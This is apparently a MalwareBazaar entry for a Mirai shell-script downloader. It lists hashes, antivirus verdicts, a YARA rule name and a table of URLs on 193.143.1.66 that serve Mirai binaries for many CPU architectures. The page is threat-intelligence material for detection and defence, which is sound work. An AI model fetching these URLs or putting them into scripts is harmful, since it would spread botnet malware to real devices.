MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa
SHA3-384 hash: e4a9ad8c0682c15b1fc2683acaf7fa3ce85ce426152986d102247e71ec176069769fae7b4eaf9ef5d9407e55ac03432f
SHA1 hash: ff244473ba6212bd9ad5a532c145140f1a464a95
MD5 hash: beaab90fbf1ab306ae5f4b9f14319658
humanhash: johnny-ohio-massachusetts-magnesium
File name:hidden.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:2'536 bytes
First seen:2025-01-20 04:41:16 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 48:vIaUu2aT2dLaWgaY5aFLWa+JzaT7afEaG6a2Fatna7Ca1:vAuJu8gLu28ug+MP
TLSH T1365181C5370343352DA7E5E339E94819B3EAD4E6D9C65EA54BF838ACA44DF0D6080AD2
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://193.143.1.66/bins/hold.x86b0d4c5f574262235ac9b84f14ab01c858aed158598ac0eac7b9c1197921429e6 Mirai32-bit elf mirai x86-32
http://193.143.1.66/bins/hold.mipsec4e12ae7910f54381dd7c325364147b17f96e0d1f5c7cfa8d818c1fc487c3e9 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.mpsl0496421dac7fc4aac7bd6d45ba1b929727804e101c3690dcedd73231aba3af07 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.arm1577bfddedee491e4f51793662f011edce5e40dd8ba17f2671c4df818aca5c76 Miraielf mirai opendir
http://193.143.1.66/bins/hold.arm51c9b4984eb0598462c2d486d0f34191c0ebe55b6f91e763ed3c0e01624585290 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.arm64630f8cb2a102cfc5202eef3f49f0073127f6afd07afb07110b5b44bde43a7dc Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.arm74d71abad98597a404007e8dc9cbec5d749e21230ff503b7574062b04378aaeb6 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.ppc99ceabbc5d279884f3663071e0622a6ae8910b342a9f70f94938a676e900678c Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.m68ka1c846734a90b87cc64ed64f51af377f5082ab719ccc35614a865e4b309025ba Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.spcc4220f5cfce574e2c2d8e5527f4dee2021bd8410406cafa705d974ab097e30a2 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.i686c4220f5cfce574e2c2d8e5527f4dee2021bd8410406cafa705d974ab097e30a2 Miraielf opendir
http://193.143.1.66/bins/hold.sh4691a2404ffd4acd39d74b956c463fee7082dd0fb1acc52783663d9d50c1490e8 Miraielf mirai ua-wget
http://193.143.1.66/bins/hold.arc691a2404ffd4acd39d74b956c463fee7082dd0fb1acc52783663d9d50c1490e8 Miraielf opendir

Intelligence

File Origin
# of uploads :
1
# of downloads :
94
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=678e2d9fe708b6e7a3ad8ec6linux22vpnfull_triage
Tags:
ransomware shellcode mirai virus
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
bash lolbin remote
Link:
https://www.filescan.io/uploads/678dd4203eb4528ec2af2828/reports/4ac8d96d-bf79-42b2-8bc1-6ab0a925b5ff/overview
Result
Verdict:
MALICIOUS
Score:
93%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa/
Threat name:
Win32.Trojan.Okiru
Create hunting rule
Status:
Malicious
First seen:
2025-01-20 04:42:03 UTC
File Type:
Text (Shell)
AV detection:
17 of 24 (70.83%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=yzovzvqxagf6pwxbrc64gan32u37lowiwtemxanfmtyzp7jakcva._file
Result
Malware family:
n/a
Score:
  1/10
Tags:
linux
Link:
https://tria.ge/reports/250120-fbnf7askdp/
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/c65d5cd61701/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh c65d5cd617018be7dae188bdc301bbd537f5bac8b4c8cb81a564f197fd2050aa

(this sample)

Mirai

elf f014a86843455dc45e2ad0885dad44723f9661d1e75552844ecd1189a891735d

  
URLhaus
https://urlhaus.abuse.ch/url/3402722/
  
Delivery method
Distributed via web download
  
Dropping
MD5 417106066914ea3e081cbb7356b1e6a7
  
Dropping
SHA256 f014a86843455dc45e2ad0885dad44723f9661d1e75552844ecd1189a891735d

Comments